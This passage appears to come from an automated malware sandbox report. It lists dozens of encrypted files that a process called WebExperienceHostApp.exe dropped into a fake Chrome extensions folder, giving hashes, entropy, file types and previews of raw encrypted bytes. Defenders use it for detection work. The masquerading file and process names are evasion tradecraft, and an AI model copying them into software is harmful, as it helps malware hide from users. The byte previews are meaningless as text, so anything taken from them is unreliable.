SHA1:	8F4A35028E813C81AEEA69A5B1C869F8A0DA80D1
SHA-256:	0517C5B0583A8CE9E06C8CC49E52C5B5407C555CA592F9B4E8229C0179878503
SHA-512:	5CE1C70C93C94F530483753261D1E037C15DE1D366D3A15C442EA2AF29736614B47D93BD7CD112F7BF103783630775B52F27D063DCF88B17C11E32058807F2B9
Malicious:	true
Preview:	B..;...(.......L.k.Z8.6:.B8RT?.".B.K..w"#T.`....$.p.T)TG..SjmYUi&>=G.W.R.....hO;\.~....%..V;....cS4TW..3.w}%#.(.E(b........!...Q.......lh3.B@.....4T8.....!Y..Q.T.%<......._.I.).MX'!..g..{"#z..<06..XU..i".9.q..4...o.y..+..."..!R.L..j-.. 5.LL..."..~......'..!..:]`s....zY0.y.<.(..V..E.Y..z.#$....<...pU.A~E..C.\.....w.Nr......v...j..<..n..]..2....xc.1.).U...J............;-.S..Q5Q..Z,b.%ur.Sn>.m.._..n@K+.r.O.C...M}j.!....j.........Q\|NBb@Rod...(..v..I...lK..........-...r..~....v?M...D.9...e.'.#2g%.9Zi[..tZ.(G..6O...g.....q}.h...0.9Y\|..{pD.o.q.L?A...........f...2%.\<h>....j.........Q..S.../>OB..C....h..xj...1!V.8deQ.O.M......#.\|L+b.q..@/.._B....L..\.....u.........`&F#.....5............8........Z.Aw$..n.....OF.........t:.....*.i..\W.{.a..F.....g9.....4.O.%.of2.<Qe.R..O...dl......K..@.U..,]....l.f.$k.[.s.....5....?w......!mI.8..t.s...Ln<w....N....!.Sd<.}a..^(.\W...M5k....F........._A.&>.Z7..n.t..r..9.{....`....C/.M.4c...~.<...n.[P...9...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.73

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	64813
Entropy (8bit):	7.997522140248982
Encrypted:	true
SSDEEP:	1536:jb/OJcIi28LcnHxWJxV/NekLSQQTxLXkSzPzY25txEe:POJPVsmxWrlpGx7bzjf
MD5:	7AA41FEF72388B147865D0A084E1A20C
SHA1:	B641E661E298C5B16786EE5F305A5BD25B17B8A1
SHA-256:	46516FE7C392F081BF66C8898AB4E84A7A96F34BE11812D78387D924C89A2701
SHA-512:	4CD69384D8582145DCDEBD303A5D06BE35640105070BFE3B5195978407315721C314BDF01949B579E3C2163BE3792F439EB229462F59F24AF75675E0C89EE990
Malicious:	true
Preview:	.MS.....h3..G.j]N....$....a..z]\|.~..:..U.M...t..xD.G..A...k........`..M..\|......W..G_.D..M.^....6.^,..........#tK..j..w[.......=..8<.../.)1`.?.=..b=..}.:W?...j=.YN..[K_.R.._.>k..Uau.w..r=.,.U.Xo.....k$.....&..)R.....P:.f...s.+....N..e^?0m.z.T.yy.1..\|.?.;.....rx.....V......:z.+........._._.I\....Ao.....F.5.XDbi....._Wo...82$. ...3....5.Rxj..U.on}B...W.#....s.";s..J.o."6.....o........D...K:A.8Bz\....(..`..O.e\|...6.P..Rz.X..7..$..]..7t[........X..ebm.X....'...g..-g.p.N..t.s&.f..})....!.... ...A.:.V.6.......?.M.D^E..K..=..t%E.C..'.s.P..Q....J..%....v.g).n2.F6.k......-p7f...D.'...?.~....X.Y.G+b`....,....OP..../.m......P.A.....;..0..._..#....,..)/.....Z$..L......?./..f.I....%........"O..JI.....YH......l{k@..W.\|..YV..$g.R.b>...6.'k]..P.b.L...5a.G.u.n.m~..h..!.(....C.....c.fw.X..f0.E.......=W...U..W.5a5u.....4... Q\.\..".=........z...m.W..,..@;..-..X...w0]e../.....OB.:..2/u5..Z...]iLx.?..T.5C_O4....:..GOz..>}...y.Pv%..M..B..G.t...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.74

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100094
Entropy (8bit):	7.997994030199969
Encrypted:	true
SSDEEP:	1536:4C0LGTTEuehZrfqJUxkr/lnQ8UsiR522LnxWQSoQiyKLqu31JAu0OwIhw3268sz9:4P4TuPcUjNsiR5znxWH9uK7rlDd6e
MD5:	F0A1482F87DBC0A6EA2534F322C4E682
SHA1:	FDA1221CA8B8CD3B8B48B28DEE843147056D402C
SHA-256:	A5E971105C37425154E1DD5E71247091F02B2E57748E91C7D8B36EA57A195F01
SHA-512:	8964C4E57B9F08C4D4E0EF2C5B537FFD4179BF7D702664CB9D663B6453472F10C9F8890CBCF8210771C988F1419C1F375BE7626B715E08E5A4B510622D569B99
Malicious:	true
Preview:	@.[.d...J.V.7.'.q.B".....{..k2%..d9).RT...Z...Y..3U=V...4<.y90../.3...p.....7pz\.d../.9..0...B.....;..)7[.5ey.d.6...5.b.byD.....n..`.l....o.....G..`...<W...e+'..2..W...]%.....@:..Q...A..=f.2...hO.j...H.3.....WH.X.L.5...3E.8.t./../B>.R...H.......cv[.I..g.......UbA1.~..2../.....~+.....g..........C..I..}.R.._.q.\|..)...}.....0...phK......7x5;..h#>d,...wn%.5.J.h.Yb.....;.?.N..[$7xi....\|C../.3.....f.u.{..../.@61..H.[./.#.n.8. ]1#.x..\|.....$`+g....Rq-..A..K........Z.c-2!L.M..}E....?..lF..)yB..XN..K..6V...dja..a..l...s..}...(.......Z...[.,.......(...f+.q......(..O.UI.75.:.j>E,V.u#3.T...q(...\....]\QJ...G.6.tO...O@..D.....X..)..6..s.U.]....r.Bw.8.N....d.!#.....@m....]._T.....j?...\|&#s.....=.E..~.......z....,..>}2..{X...o...............+. .N.-.....v._....JM.-.Om8Z...5...\|J.v0D.F........u....@v.+.=C3......#p..G....}..&:....f..>........';.6....*,"..ud.2t..1>.&1!T2.-.3.......]..fE..G8u.....?=.w7.U.g..{..D1..>J)...~%(.<.HI...B..M..H..........+1.Z...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.75

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	32346
Entropy (8bit):	7.994039415758425
Encrypted:	true
SSDEEP:	768:x9J8z9q7p4SWZ9CYwLHGCjNZQPahYvLH331gfNhCx:x9JGiLH/0DvLHHMhq
MD5:	E1FDD9D1ABBB0B1F09208E265B077A6A
SHA1:	51C427F0101EB3FB9106BD0D0A33242CC855C830
SHA-256:	4AE05BB16A695FC499A84E5129F8EAA628FF602DA7F75D04397EFF16F24BB541
SHA-512:	AB875717F617CB341AB74543FC0B0AC374CBBE87E948AA5C3F967A40BACCC0F31BF57E28F4A3FC5034690487B8B21FEABD183B72B8B2043BB2A411A149A14992
Malicious:	true
Preview:	A.mug$.k... .iYj...Ae.0.H.y.F.g...FQ.j....].#...X......3..v.....sp..N ...H8C\..)iL9a.?........{........]...y..~.9..m...d_.o.=..W.!.6t.........5. .:H.%......d..=y.oU!!..^......_..X?.gwkn/..-..I......r.1......a.... .ax..l...g....-5..M...M....e.L...#.T.h8o.........b..].Ub..IH~P.....2..<.<.g4]..b.zv.^S6.F.Q;..`.J<.A.j..vwN='..L....k..1..f...o.#.?.3.-b..(..0xx.........j..-E..w;Kf..ew.y.\.....[^.c~.........WZ....w..F..<U.....h v..W...=...+.H}.O.zZ( Oi.Il. .F..<!G....}.8f.=.&......\;...z.~..^..t ..T.n_z...7p6.......(..J..6`0......@.......#w.r..q.\|..r.;..2"..&.7...G.:K...{.m..M.L....#Q...Ap.S..W:X..g.8..[.bln.%'..h..kP;l.:.0l........E..=._9l.I..WS.,......_Z........M7Q..L@.~R.'..........U..;...T@..Qp.K.#Z.Pj.z.Q~K.w.-.....R.<.)Y.dj/4t..^.@...d&Z..K@....g.t8..?..M....{f.d>....}..r.B...z]>.J..}?...x..L...x.H....n.C.y.....:.wo...F:...aSg..T.z.>T.;.>............''-xfoVS.._.+dY....z....!.".q]17..;..).,DFT...g\...-..Z.X-a.4.0r...'......8Y....UqK..X

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.76

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	88688
Entropy (8bit):	7.998058346676402
Encrypted:	true
SSDEEP:	1536:icUGQY7EltmtVxG5+FIq9RkPyZT60Hqo5gYyCUGdZISaxRRppciYxx2W:FUGQiElctVxGAF74yrb5gPC3dZuxRRpG
MD5:	B9480F498E4BDB8F6664CE744C779497
SHA1:	612BA2991EA659695707B2DA7FFA75BA4F781D0F
SHA-256:	B89A5C62BF196176FC4F232AD2D4D57AA1687761B1962A226BDD59CE90812826
SHA-512:	42C619F2F647512921FB56C0BF2E51B1D43842B356F6E980DB0E2E13EAC1682D5AC4850010EAAEA45E553BF54A32AF78BCCDF0CACA2B9EBA15AFFD37B04308A3
Malicious:	true
Preview:	n.e.d...2..J...cH.'.N.......VL.l.S...v;..a..b......?.F..^...e@c...l..W..:.;.Q.....=.Sll.3....5. ...ms...(.....`-..a..8.-}2wA.+.Ih..w.I-..]...]B....M}.[$......o......>....w..n..$.?2..6PR..b../..!..........K...-#..`..W..2.._,..$....>~m=k.0.c..vL..PF....&wJ.D.\....z..... p.}...?u.........L.2.d.1.x:....).w.@;.b......B.o...r....fb..B.q.k....f~..[c.....KMd.x.......#...FU.i.!..q.....k.^..b`.l..2...\|?...L.....gs.PA/..r..j~.zG`.....n].r5..Ef"x!....5.ytg..&..2...j..?'<.....E.\|..~..).V..n.."..!....MyW.d.......~i.9@...C..m...VW.p..ee.r..:...u.....5....:9..D..k..i..;..$...M.!/Lc......Vz;w.:.'o.^.v.o...U.8lQ.6I....~..\.Y.fg..z.V....cM..&.j.... ...P\|....).a",.C..[a$a...:...D.Q.....0.).J...9.I...I.0.@a.._..BLB.R2t.hE.O.z-..O..p.v..0>ET...h...WP_.c."......i.V.P.d?%.2..I.W..O. .`...8.P.../.....hh.2N.,s5Q8..w...m.TC.H.._..o.3..R.BZ........g....y.xY.p9.._-\[.FR.5..0[TZ_9.wA..]T'.{.`...rO..b2....i?].I>......D..F_._..W.<'.....B....5<..F..k..V. ...)L-^.....[.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.77

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	44827
Entropy (8bit):	7.995942694972688
Encrypted:	true
SSDEEP:	768:ni6L5E3Y8r6Ec1afjHgn2ZkGdzuDW7kC9ovqXi7vQt3LM:dtEOarHC2WGdp7avX4NM
MD5:	23CB464D02358F12140C48D04ACD6729
SHA1:	5B091EA2A4418DA5D02BC92F14C89AE91AFE3CB3
SHA-256:	205B1D074CCF72952051ED927F9A4AF2316E55A8CB64DDD2324047878D4AE06B
SHA-512:	D97C5B264125CA3AA56C5E22F035584FCD36ABD15D53903C62375D689C30421E8C5605635DFE58ABC29BB8D125108460550B9180F2F9708D4EBAAD9C834B8BAF
Malicious:	true
Preview:	W.q...0.-n.g.Qv....n.3w..AY....i...v..>.T...Ve.xA/VF&^..$..t..cqz.k.\|.0E.!a.]/...0.wh..."..k_x6L.V....<$...JnD.+..-cs.n(..o.s..KRq..Y.j.[)s2.!iLr.....Y].....g......I...#./.!,....}l...a....k.h>.......u.b...<..be}Q.. H.W...Mo.4.B..,..9....v.$)R..,..m....v.4...V.o..pI...j..6.M1.....T.g.6.o.h.x.....+.+... rp......87..Y.BS.3.H..xep.>>.z....1...hl6...........A....VCa\.....P7mV........M.'h7..a.......4W(..e..Ti.Z<O...`.CH.P...%....L..3.........5..mlX..a.Q....L.......YR.wLt,......oH..\.....A..c\|..%....S..f..n.S.h.......QBy-..o.........\?bww.`..V.._..........&.......W.....N.1..m.+.\ctO.x.\`.z\|....l.u."p:6~v.E.+v./.].V..f.O?...g..H.?..C.O/....T.......5.C.\...6..l....c..l........=.G..-l.-&@.ot...........-.oo.t....q.~5...h.......u.(........x65..iz/.d.............m...,A.,b_..WR..>.......(...#.]]8~v..>....?..R.K.'.wo.7......:.P..u..$...gY........4.&.v...h....i..W.n9...?{H:..e..nts...v.2...R.A......4.......CG..].}0.f...:...P.XjT............C.j.4^\.>._.e......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.78

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	99045
Entropy (8bit):	7.998323358485621
Encrypted:	true
SSDEEP:	3072:s8wPhipsI0w89RcBK/1tPPSOmvQy6Y9LlDA2wMjcqeaR:s8wP8pZ0V4B6PPaxnLFx4qew
MD5:	48E6554F4F4405862EDDF45E5DC6F8A4
SHA1:	2DDDCAB47EA2C9849294D219656EB644A59B1D9A
SHA-256:	82C20D9281F8EAE695DDEE981CF74000BCAE7768664A1C8A4F6367831D57C15F
SHA-512:	951577D2FCD52939991B9F4C2AED3BBD10E9A41F40E635EBBCD440F1B1CFE2B950472D6B00305C96E390A5B5F863B35475CBA130FF3531CD56C3CACFF7EDB483
Malicious:	true
Preview:	L..l.I...'.F..RX...B.....`....5....Fs.[pV.8;r.l.(.Y.a...SqD.u%.\2..6...I@v=....@l.`..Hq...r.'/......s^.w.K_Q.q.OW...:N.0...w.2.8. .q....7........c1."DY!U......+).RM...U.\../GK._..$(^...2......."...o.,...ru.B.{ 74..X.#\.....@.7R....f.P.basF............V.i.G..s55.(.....qm.......d}..p....T.........7..H@..NfaP....D.7.e..xM.-...e.o.g{..c(fG..k.-.d.....9^Xk.nwI.y.\.w.f..&.b0..M`..........).?..-.9s..b)Q;.....j\#.ty...CiQV..K.=V7G...&.z. ..:.........9?...Gg..v~M..UYa$.T...Gw.=...s.O..M>..4.l.-v....=...2Ix..+..^fX..~......x.v.}..4..d. k.?:.@u.t.E3D..#...%./.%.rl.iy.}...p..l.z.{`.........:.n......".F....'X..Q........w..&..(.gQ.)~...k..Z..'.Z..Co.Y.T....w.t..m..30.QeLr8.x....v.4...uh././L!...p.9..].O..g.O..x...\|l.tHr.KF-`.r.......kl.3E.y.5.iSd7U.;9....u.!G....q.=...~.JA.8...G.......a..V.5..v....%F.M..~ah..3..P.U..m.....v.I..%;W}.....Jn........e..y.!....%.z.G..h....(,K....eN.xo.:.?wz3.e^L($N..v.DT.5.\..f,-....C...i(..vR.[..;.2..T.5.2.....{.3.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.79

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	38207
Entropy (8bit):	7.9947466799324705
Encrypted:	true
SSDEEP:	768:ZwW1wsM1s7u1y2rJ6pyOlQYhw91TgsH6unjIswH48TWVDbxKITzsmnO:GIu1yMJ6JFw4sayQR8jf1O
MD5:	78566E882108340849F23691ED8927C8
SHA1:	264B95F11EC8A61C572FDAFA6A67F59CBFA710EC
SHA-256:	133BDA06B66573656FCC497819FA8BDB5493D6B224354D10C96A610AA7C0F97F
SHA-512:	383CBFFB7C0E58CB84E2FB7D3A6C0E22BEA7C8022D8F96A5A03A388D451F79EDEA9925A9ED5A9636977C20B91F928F94B7F1E978EC39FCE0DE2FB6502137EBA5
Malicious:	true
Preview:	]x........d...).Y+.K....S.#...s>.x..................Uo..;...~O.........E..W..........re...N.y...3.&.oG.h..C.i..^K.....Y.t..-...}=...r...h...h.r..zXQ.W'.7..X...5..)]".7$:......%..0....2..98..6j(.S..l.../ ..:+ .n.$.Q.X..}...Ki.bHZy...G..P_.".5........(f]..o.f...8K.P.F.~...Z}...!.;8..G .....1.....>...'F.+.m1.....l.O....G...I!x6.\...[T.l....w..7.......I_P.....G..A......[.....i.XYr_h%.[......Oq.....qZ.S.:.}.........X.1+y..8.....W{k.t.P.I.\.7.....%f<.2.. ...>.dT.I0..@'=....O..0...pd......#R..K........U...M .q`..a.....n.C.....m..f...k ...w..;...&Z.$.>.......yu...)..6.C....J..m...b..D..dW..q..+.0\.$..+nHL).@t.>HXs@.+g.....x.....~..4u...x..L...-.3.2.e7vV.@.,..+............bK....xw......J..v.+.X.h}..T* KG.u.+..........h.}.(.w...!Mc._.8.?JV...\..z.,.[CR_Ff.g..88....r..@..r"lc.>..;..V+....g.^....).....`..),.0..\|5.~....Z.s.O.N..>eN......J.......z.X...+....^3aWL....F`.s.`[.c.A.+..D.<z.n.v.X3..o1...".....1..fq...h.....C....+.N.b.."Q...;...Fa.e.s..Q..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.8

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	116135
Entropy (8bit):	7.998330246951078
Encrypted:	true
SSDEEP:	3072:/wZO6Y2tBn3F7/iSFLoeiXXI+6X3Ulz605Y8TDZ:UOd2tBnV7/iSFL3nUN605Y8TDZ
MD5:	D50B23986C13A978079383F95172FC0E
SHA1:	9CE4B4078BBFD50D6E8465F059DAA3F12D19583E
SHA-256:	CEF39B404EC3FD029098A5DDD2E24CF39E35E41C11636F63AC5C6C2E7D0F1704
SHA-512:	9465A9718D08669892FF2F13692DFF9612D4AD23172FCF1A9F154C54A565920C9F7EE9FFE80FF4582D9B361E0C4916D5DC435113E061CF9D364EB6F9BA0AFF99
Malicious:	true
Preview:	.'..Q....-.......~).e.4.d..L.:U.....{..t%...>K....R.8.....rH.;....&.eRk.h.".s..a.03........D..\|o..Hn..g..=...'L.q.,..........v..`b2pF.b...F..L..58.BO....D...f.[..F7......f..6z..CR.Q.5.......'n.iC.C...t.....3..%.+o....b'\.Q.u..P0..6.3........./b@..H....-....t..]O...E....._~.K.?..I...U....e_8..4.....h..n......<.t.m9...'[Y[.f\M.+...91.."3].+...U....I....u}..U........1=R....^'.(t#U.0....x7......<d..P...cn......1J:..].......(.n.Ieg..v.0.)3j..H...D...d8n..`W...z5q.:.?...\|.z.M.OG.K6......>..`5.....Y..$...F...~}dS..u.?....D....2..$.,.f7.\...go1.d,.'<Y..Ls..-g...N.8].C....Y..\.n-`.._...].u..~.......4.h...x!.2..c.c..G......t.M.......,N.[.....ZP....l.s...l.Aqi.g....L.].a.p.J3!P%ML...-....s..+.0...e.T.{w..G...........H<...^f.....A./..2..#....U.N.c......L.....w.D......`..rrP..N^]5...'9..'I.....6K.)..l...!...V()....#..H..s:....,...IJ'.R.`;L..^....\|..O.?.^......_f.s...~....8...^-.]..Y..z?..u.^..cC.A.[.a...G...y0....Q..U.Y.....p....~G..Y...@.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.80

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	68742
Entropy (8bit):	7.997258585330826
Encrypted:	true
SSDEEP:	1536:9qeBnQ+LrvqNXwezKu8uQn06e6kcygVAjrDHiuH8T3jRo3o:9qPAryFw5ui036C7bIjRo4
MD5:	FE99BA70AD426A1D5CCBBDB72097FC9D
SHA1:	0533475AA1032B7A6FF63A6B623F27AAC1706A12
SHA-256:	33EE1304C42AAA7E1B45B4D4C61F9F3AAE9B4EAAA7F87732736F1DD54F3D0570
SHA-512:	6A4685298184D97652813AF92BBCE9D1B2E61F4AF75F3166F8FDB93FF6D447E4B337149E8D7531A2D4F20AC772747A4F51AD7BE2B7666EA519AC9EEC84FA71F8
Malicious:	true
Preview:	ZK..X...1.B.....a.}.q..K.p.G.=.q.h..j...I...4.B".4t....%....24.\|+56M.~..L.K/.V4p..)w.....&.<ge!.!..MNT..l.'...i...'.L...\|..f..g&.{.$5..E..RcN.MgS....p$.2Sb3./..u.$u....{S%.7..uX..S${.....q..P..0..K.`j...{L#..9k.xR.w..I-1...........4`..n..(.vl..2...t....sg.,..qe..>...m.d..Ft\\'..l.&wR....`.x~.a..V>..y.5j.>..........t..3.]d..^a3.^4.l..c..M>..yU+!.....=#.'..o..I6+7..F..@.s..........^......SX..........6uxe...i`c...j.E........r..QL/...zN..G..w...}E/..\.-#%.^..X.2.9I!...M.......M6........=/....L.,......1... k.I.....)g.!M.\L.}..L........U.. N.4.L%.....l.`.1....".T..j.'Y.I.....v...h.....i.......!...@.......J.BR....;..M...nA.jw..b......_Qp..h."..=f<..I...-.sb...".t.$.........u)C....&.........D...].`$..L..B...x....%.p.j.X..we............2...zc{3P.+..\....s9#..[}</.5...3O.yR.Uy....D....>.~.....0....B.......^......<......2..3.$;...X..o'..;..P..8R>.-.d....(.....x...qa...g......M@>...../.\c...`.2..1......n..&4..8.L..~#2.\._..t 3..$4.o..1...Q.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.81

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	102059
Entropy (8bit):	7.998054597912209
Encrypted:	true
SSDEEP:	3072:fDrncjHydith2ibxz7GBCTSYYRq3rAfoJ8pUuq9:fD7cjSE+e5GBCjYXf5M
MD5:	81923B3A609FDB4DAD140FFE96FF02EB
SHA1:	D9B260203958CED71B8DC09C184C29DECDBA9A50
SHA-256:	CA5CA7DB7BD029BCB69B697A7FE62372EA9161432B9DDEC76A55669268507EEC
SHA-512:	9D683803E563ADE4C4BF010AD89629736F762C15F9E8F60DD68C1344F16FFCB416548EC2AAB63AD57A94DCE1AECB65B79453ED9B6AB5A2E7BDF376A64674AD63
Malicious:	true
Preview:	....;l......_.~.-....g.].1.9".;.^.NY....J...t_..d...}`2.....0.R.-......].&Y(.....mI.X1X...Y8<.+.3.X/..:...5p.LN...8.+..)dKBs...?...p.7....8."..#..s./.'.:H...N~.b.....76.........._...M.0^.y.....a.m~H%.....K.....,#{.m}.....9..&.....e..jWX.sG..(<..&.$3........!.R._.4#.......DQ.).^b....#..0.ICF5.....CW......:VH\|o...d..2ks...K<..,..+...I..hH...T...,U....m.>.E.....Jr.!.......>.7%..c..........c.J&..Mg..?b...U.....J...K.ji...k..:.)kg.k.C......!H...7...6.6.M./.H.v._.PD.Q.n..2...).l.G..!'.!.z.>..-............8w.D.._..;.~.........d...t.).M....Kg....x}t0.{C;....W+ 3......LF`=.\|\.fs...g=.5..@....}.P..........o0wP2Y..n..5J.ZC.eA.z.E..l...H`....6..{`.t...(.@.k.Y_u.m.....K...t?...H...["....k.0....W.-..Qd...5.[yh.).A.....2.......Flz.....rD..W..K.H+.+..Z.1.Pd..._.e.......s.....K...E.....p.L...<.%....~..\|.u.....TsY....h.U....J.P....H.t.x.B.....y.......I.>v..T.Dv...e.E"..0.\A....aK....u.\...g....m.W%.]...e.h..y.U.r..^I,.v.b..j`..o..s..mWU.&`JT...im..o

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.82

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34227
Entropy (8bit):	7.994011364088701
Encrypted:	true
SSDEEP:	768:5RLYERYH4L8SlMzrhvJ36+Xa8DQzA83OChRyOrkAJgQfGHCasB0mgh:LPLMzrhwniQJ+C6ckAJgoGiasamk
MD5:	D167B1697DE3D85C00EF40F95B0E11D9
SHA1:	251EE1E1D23A13C5B473161E64971D7D8E31F346
SHA-256:	78A5531945A812883687C32DA4051841EE0EDD31F3A09B80819E1A0B25B5214B
SHA-512:	49A1B9C322ED08DECD5FB0FD2664D815D4E405683EF48477FAACA63F953E20B283FFCD042E7806722C81A1824A938F29B1A6368FEBE46BB58C9A220C80436229
Malicious:	true
Preview:	../.....tZ.O.J..V....Q.XQ.y2.g.Gf....{a...IwIL.+(...6..L.K.RB.8i-...qC.`....9.ga3..w..5E..6...-..&Ho....@.#\|..ZZ..J:_.s#..[.z...Q.t2.z..2.(..e...B.....n.(...VQ@......3...m....al.)....y....M.?..QZn..[..=T.F.....-....m.....D../F+O.@I.WV3OI+s....(.L[g_.3...t.N...6..=.&>.h?k.Q.U8-...R.V..K.....:R./.....c.......[.M..c.....I.....Gq.>/..K.y.l'Dg.m.!..<...Zk[.o.`...$..M. .Y.!.TR+$.U.4.E.D [...\...(j...n.uCC.E<cR.....k...^.t.&......\|F..............M.k.K..#k.L....4....FJ...Z......&1....w.:....%...3.T...Y.........st...d..K.].P..St...C. 4..]f.....V..4..7!V....t.._Q..)..]u_..D..xF...,.._xi....Q..?/@..7....D...3.g.vD.P..-..n..n.#....<...;..p8!.Q\w.}V.\OR.:....!6.RN.....{\|.o]..npm.g..1Y.....B._....y....2x?.H.!...a.....e..$:.o./...}..u........jw4].0!... .A...\|7b_.,H....'.......\|.#..d.4*..x.....?.&.d....#.^...G...P..L0b....&......}..O_l..`.g......zf.i....pXX...C..`\|t.;.4..#0..:.G..2v..c).....B.N.8...8w...!0.\|..Z&8...."+T...Lf.D..o......b.W.....W...M

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.83

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	92795
Entropy (8bit):	7.997902034189043
Encrypted:	true
SSDEEP:	1536:5KZwmro+0riVV3gvyVnbJd+l25h+BIyOCwWHTGBtHwPngp+svh/R9B0m2:5KZZb283g4f+lKyj9H+tOgNh/R9B01
MD5:	D3298F0CCB234B675ABF50B29B936BC0
SHA1:	29C8172D490A607E2C611630863ABA4BE6D09C74
SHA-256:	F80CA1132AD08D38D7C5C242F44A35C003DCF873AA3BBAA86165392525734463
SHA-512:	D30CA14D12BD31026513068B5145F7268497996529301CEB683EDCC25AD4CC0AD7E9435179AE957638DBA87F0A3B68E0E3E4BE89FFE868BD01EECAF3C06CE1A1
Malicious:	true
Preview:	d.I......g+`..OJT.-...T... ./8.D;..4.P5neA....(."...WV2.G.".:....f..@.BEj...>!..Y..fsq.X....g...#?L.....C........o.4(.....a..M1".F..c.....`..>...jf.,y..h.t..(...\..K........,'1&..1J..=..3.Z.-.h..v-e..n3.~...}...G..t..."N...'.8....A....2......\.c...f)j_.6n..\|......f...L9..uUa..[...g...M.%.V...J.......)..[...\|...$..N2r..2.....t..& ..o...d'Q...N....D.Q..xB3.[...+..V.).....@....2I.]..w.4....a.C...Id.........O..h......q`"........A.%}..!Qn....?...........LV\|^~....#qA...c?.....(...6.0..Xw....ag...Q.}hF....V.}ut..T.v#..JQ..+N....^#..16i]..u.M.:.F.k.[.1..3......a_t)...e.7...$..b....)...F..0...v..R)Kw.a]C.l,.XB....0z..R...k(.I.H.[`..5<,1>.....$.":.E.#.R.q...[! ...4...mx'.C.j.&....d.hO.. ..j.......Q.E+.-h.._z3..%.S(.o.Y........P.4......bb...@.W..0.....E..._....2.H.EH..k[...Y. 4O.."[M.......]$J.B...?.uLG@..-E.=C....l.....ex.}**.G'.=m.Ji4.....q.F..;....=T[D...}...T.r..oN/.cDXM.........'..cup.4.../..,..........=.W0...l.x.O-..5.e.9T.!l.Z.!,.BuQ....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.84

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	29025
Entropy (8bit):	7.994564520642329
Encrypted:	true
SSDEEP:	384:Y+/SehuqOmgpejZj1Zn6l9248d9n318ayDnH0QlCZbCk0fcpyv82xy6t1zub:N/VdOmgpe1Cl9Ql8ayDUQoZYfpM6tdub
MD5:	2B776F43903C96EAF10BD758DFBB9177
SHA1:	4F9E9ECD4028C3ED39DA3A481A8146FB3D4F16BF
SHA-256:	E8020B2D733E5200514C54C6401787669F72EAB2692119A39BE31A847D4A4303
SHA-512:	52D3F47DF943E8EE1A0AED108B318400B25B2FC88168227A828A637BCC3B9D37C46212388D2EE393F8B6F73B60B129756FF9AA85F0540E017ECB1A2A64708376
Malicious:	true
Preview:	.2"y..Z#".g.~..}..g..$..A..3q......,.Y.&.......;S6..(.Eo..?.t.Q.C.g.G.P&.1...j.!.X.\.1ET......n.G#.........~..Z..V..~O!.....j...J...'mu2..n.B1.K.G.o.}.A..^..-t....{.....e.T..X.h.LC..^...:c?......K{V..8m..r..*....)g..._,V..8.K...^[C6..ln.....\|.......y..../..:....Ov.../...R..!.S..^..MR.v...:..z...V.<...2........ln...'......9..9.._.@2..(zXq...7...K..s..Az.)t...Q%.Z.#...G.^W..-h....A._.=Q...L......K.[~Y.Ab....:Uc4....\7..A.+...u~%..).@G.{pS.PG. &.9...P........6....n7..\c9...Y...dp.C0!...X..+..J.e..O_..#.....D..A....J:.".._Z..t....2...B3>.#....k^.;...Rol?.y.A....&'.\|........4.J......H..i...,.....L...en6......R...<..}..`.......)...%...DY..q Q....../..J./.....6/.}...9R.....{.[..ki;.....N.........)d.c..t.....Q.Xs.?^L.....T).={.H..A.ptX..t.A.D.."..C.........G\|.L..Wn..I.t...p....x.c..4...a...7.;..F...1.....u]"ro..T.p..I..!......\|\|3.qF....=Ta.7.-I.....o.c&.nf...Lq....c....q6...^T....KD!...M?..d#.....:/......Okb......Yb'w.\|>.k>j.P\..{...Y.......l+q.4

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.85

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	207268
Entropy (8bit):	7.999051433228926
Encrypted:	true
SSDEEP:	6144:dANzec6KClGKkvVBspri0LDCyDuTBowGV:d0zQcDLsBiiPDsBowGV
MD5:	D8433EDBEB1E761FA6FB5E3991071843
SHA1:	A57AB810A4D4C99C4A9608EBF391B3EAFFDF6325
